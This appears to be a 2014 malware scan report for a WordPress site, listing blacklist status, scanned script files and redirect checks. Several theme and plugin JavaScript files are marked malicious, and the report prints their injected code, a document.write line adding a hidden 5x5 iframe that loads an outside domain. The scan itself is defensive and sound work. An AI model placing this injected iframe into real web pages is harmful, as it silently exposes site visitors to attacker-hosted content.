Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=pulptheology.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://pulptheology.com/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://pulptheology.com/ | 200 OK Content-Length: 74724 Content-Type: text/html | clean |
http://pulptheology.com//www.hellobar.com/hellobar.js/ | 404 Not Found Content-Length: 300 Content-Type: text/html | clean |
http://pulptheology.com/test404page.js | 404 Not Found Content-Length: 285 Content-Type: text/html | clean |
http://pulptheology.com/wp-includes/js/l10n.js?ver=20101110 | 200 OK Content-Length: 0 Content-Type: application/javascript | clean |
http://pulptheology.com/wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.js?ver=1.3.0 | 200 OK Content-Length: 174 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ;document.write('<iframe src="http://slhzpllrp.mynumber.org/geographicallyconquering.cgi?8" scrolling="auto" frameborder="no" align="center" height="5" width="5"></iframe>'); Antivirus reports:
Hidden iFrame found. size: 5x5 src: http://slhzpllrp.mynumber.org/geographicallyconquering.cgi?8 <iframe src="http://slhzpllrp.mynumber.org/geographicallyconquering.cgi?8" scrolling="auto" frameborder="no" align="center" height="5" width="5"> | ||
http://pulptheology.com/wp-includes/js/swfobject.js?ver=2.2 | 200 OK Content-Length: 0 Content-Type: application/javascript | clean |
http://pulptheology.com/wp-content/plugins/sexybookmarks/js/shareaholic-publishers.min.js?ver=3.3.6 | 200 OK Content-Length: 174 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ;document.write('<iframe src="http://slhzpllrp.mynumber.org/geographicallyconquering.cgi?8" scrolling="auto" frameborder="no" align="center" height="5" width="5"></iframe>'); Antivirus reports:
Hidden iFrame found. size: 5x5 src: http://slhzpllrp.mynumber.org/geographicallyconquering.cgi?8 <iframe src="http://slhzpllrp.mynumber.org/geographicallyconquering.cgi?8" scrolling="auto" frameborder="no" align="center" height="5" width="5"> | ||
http://pulptheology.com/wp-content/plugins/sexybookmarks/js/shareaholic-perf.js?ver=3.3.6 | 200 OK Content-Length: 174 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ;document.write('<iframe src="http://slhzpllrp.mynumber.org/geographicallyconquering.cgi?8" scrolling="auto" frameborder="no" align="center" height="5" width="5"></iframe>'); Antivirus reports:
Hidden iFrame found. size: 5x5 src: http://slhzpllrp.mynumber.org/geographicallyconquering.cgi?8 <iframe src="http://slhzpllrp.mynumber.org/geographicallyconquering.cgi?8" scrolling="auto" frameborder="no" align="center" height="5" width="5"> | ||
http://pulptheology.com/wp-includes/js/jquery/jquery.js?ver=1.4.4 | 200 OK Content-Length: 0 Content-Type: application/javascript | clean |
http://pulptheology.com/wp-content/themes/bloggingstream/includes/js/general.js?ver=3.1 | 200 OK Content-Length: 174 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ;document.write('<iframe src="http://slhzpllrp.mynumber.org/geographicallyconquering.cgi?8" scrolling="auto" frameborder="no" align="center" height="5" width="5"></iframe>'); Antivirus reports:
Hidden iFrame found. size: 5x5 src: http://slhzpllrp.mynumber.org/geographicallyconquering.cgi?8 <iframe src="http://slhzpllrp.mynumber.org/geographicallyconquering.cgi?8" scrolling="auto" frameborder="no" align="center" height="5" width="5"> | ||
http://pulptheology.com/wp-content/themes/bloggingstream/includes/js/menu.js?ver=3.1 | 200 OK Content-Length: 174 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ;document.write('<iframe src="http://slhzpllrp.mynumber.org/geographicallyconquering.cgi?8" scrolling="auto" frameborder="no" align="center" height="5" width="5"></iframe>'); Antivirus reports:
Hidden iFrame found. size: 5x5 src: http://slhzpllrp.mynumber.org/geographicallyconquering.cgi?8 <iframe src="http://slhzpllrp.mynumber.org/geographicallyconquering.cgi?8" scrolling="auto" frameborder="no" align="center" height="5" width="5"> | ||
http://pulptheology.com/wp-content/plugins/featured-content-gallery/scripts/mootools.v1.11.js | 200 OK Content-Length: 300 Content-Type: application/javascript | suspicious |
Hidden iFrame found. size: 5x5 src: http://slhzpllrp.mynumber.org/geographicallyconquering.cgi?8 <iframe src="http://slhzpllrp.mynumber.org/geographicallyconquering.cgi?8" scrolling="auto" frameborder="no" ;document.write('<iframe src="http://slhzpllrp.mynumber.org/geographicallyconquering.cgi?8" scrolling="auto" frameborder="no" align="center" height="5" width="5"> | ||
http://pulptheology.com/wp-content/plugins/featured-content-gallery/scripts/jd.gallery.js.php | 200 OK Content-Length: 25579 Content-Type: text/html | clean |
http://pulptheology.com/wp-content/plugins/featured-content-gallery/scripts/jd.gallery.transitions.js | 200 OK Content-Length: 174 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ;document.write('<iframe src="http://slhzpllrp.mynumber.org/geographicallyconquering.cgi?8" scrolling="auto" frameborder="no" align="center" height="5" width="5"></iframe>'); Antivirus reports:
Hidden iFrame found. size: 5x5 src: http://slhzpllrp.mynumber.org/geographicallyconquering.cgi?8 <iframe src="http://slhzpllrp.mynumber.org/geographicallyconquering.cgi?8" scrolling="auto" frameborder="no" align="center" height="5" width="5"> | ||
http://lite.piclens.com/current/piclens_optimized.js | 200 OK Content-Length: 21750 Content-Type: application/x-javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: pulptheology.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 05 Apr 2014 06:39:08 GMT
Server: Apache/2.2.22
Vary: User-Agent,Accept-Encoding
Content-Type: text/html; charset=UTF-8
X-Pingback: http://pulptheology.com/xmlrpc.php
X-Powered-By: PHP/5.3.27
GET / HTTP/1.1
Host: pulptheology.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 05 Apr 2014 06:39:08 GMT
Server: Apache/2.2.22
Vary: User-Agent,Accept-Encoding
Content-Type: text/html; charset=UTF-8
X-Pingback: http://pulptheology.com/xmlrpc.php
X-Powered-By: PHP/5.3.27
Second query (visit from search engine):
GET / HTTP/1.1
Host: pulptheology.com
Referer: http://www.google.com/search?q=pulptheology.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: pulptheology.com
Referer: http://www.google.com/search?q=pulptheology.com
Result:
The result is similar to the first query. There are no suspicious redirects found.